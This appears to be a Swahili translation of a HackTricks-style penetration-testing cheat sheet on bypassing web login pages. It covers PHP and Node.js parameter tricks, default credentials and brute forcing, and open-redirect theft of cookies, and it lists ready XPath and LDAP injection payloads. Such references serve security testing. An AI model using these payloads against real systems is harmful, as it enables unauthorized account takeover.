Login Bypass

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

Kupita kuingia kawaida

Ikiwa unapata ukurasa wa kuingia, hapa unaweza kupata mbinu kadhaa za kujaribu kuzidisha:

  • Angalia maoni ndani ya ukurasa (piga mshale chini na kulia?)

  • Angalia ikiwa unaweza kufikia moja kwa moja kurasa zilizozuiliwa

  • Angalia usitume vipimo (usitume au tuma moja tu)

  • Angalia kosa la kulinganisha PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Badilisha aina ya yaliyomo kuwa json na tuma thamani za json (bool ya kweli pia)

  • Ikiwa unapata jibu linalosema kuwa POST haikubaliki, unaweza kujaribu kutuma JSON kwenye mwili lakini na ombi la GET na Content-Type: application/json

  • Angalia kosa la uchambuzi wa nodejs (soma hii): password[password]=1

  • Nodejs itabadilisha mzigo huo kuwa swali kama ifuatavyo: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; ambayo inafanya sehemu ya nenosiri kuwa kweli daima.

  • Ikiwa unaweza kutuma kitu cha JSON, unaweza kutuma "password":{"password": 1} ili kuzidisha kuingia.

  • Kumbuka kuwa ili kuzidisha kuingia hii, bado unahitaji kujua na kutuma jina la mtumiaji halali.

  • Kuongeza chaguo la "stringifyObjects":true wakati wa kuita mysql.createConnection hatimaye itazuia tabia zisizotarajiwa wakati Object inapitishwa kama parameter.

  • Angalia vitambulisho:

  • Vitambulisho vya chaguo-msingi vya teknolojia/jukwaa inayotumiwa

  • Mchanganyiko wa kawaida (root, admin, password, jina la teknolojia, mtumiaji wa chaguo-msingi na moja ya nywila hizi).

  • Unda kamusi ukitumia Cewl, ongeza jina la mtumiaji na nywila ya chaguo-msingi (ikiwa ipo) na jaribu kudukua kwa kutumia maneno yote kama majina ya mtumiaji na nywila

  • Dukua kwa kutumia kamusi kubwa zaidi (Dukua nguvu)**

Kupita kuingia kwa udanganyifu wa SQL Injection

Hapa unaweza kupata mbinu kadhaa za kuzidisha kuingia kupitia SQL injections.

Katika ukurasa ufuatao unaweza kupata orodha ya desturi ya kujaribu kuzidisha kuingia kupitia SQL Injections:

pageLogin bypass List

Kupita kuingia kwa udanganyifu wa No SQL Injection

Hapa unaweza kupata mbinu kadhaa za kuzidisha kuingia kupitia No SQL Injections.

Kwa kuwa NoSQL Injections inahitaji kubadilisha thamani za vipimo, utahitaji kuzijaribu kwa mikono.

Kupita kuingia kwa udanganyifu wa XPath Injection

Hapa unaweza kupata mbinu kadhaa za kuzidisha kuingia kupitia XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Kupitisha Uthibitisho wa LDAP Injection

Hapa unaweza kupata mbinu kadhaa za kupitisha uthibitisho kupitia LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Kumbuka Mimi

Ikiwa ukurasa una kazi ya "Kumbuka Mimi", angalia jinsi ilivyo imeundwa na uone ikiwa unaweza kuitumia vibaya ili kuchukua udhibiti wa akaunti nyingine.

Uelekezaji

Kawaida kurasa huwa zinaelekeza watumiaji baada ya kuingia, angalia ikiwa unaweza kubadilisha uelekezaji huo ili kusababisha Uelekezaji Wazi. Labda unaweza kuiba baadhi ya habari (codes, cookies...) ikiwa utamuelekeza mtumiaji kwenye wavuti yako.

Uchunguzi Mwingine

  • Angalia ikiwa unaweza kutambua majina ya watumiaji kwa kuvunja utendaji wa kuingia.

  • Angalia ikiwa auto-complete iko hai katika fomu ya nenosiri/taarifa nyeti ya fomu ya kuingiza: <input autocomplete="false"

​​RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa kukuza maarifa ya kiufundi, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Last updated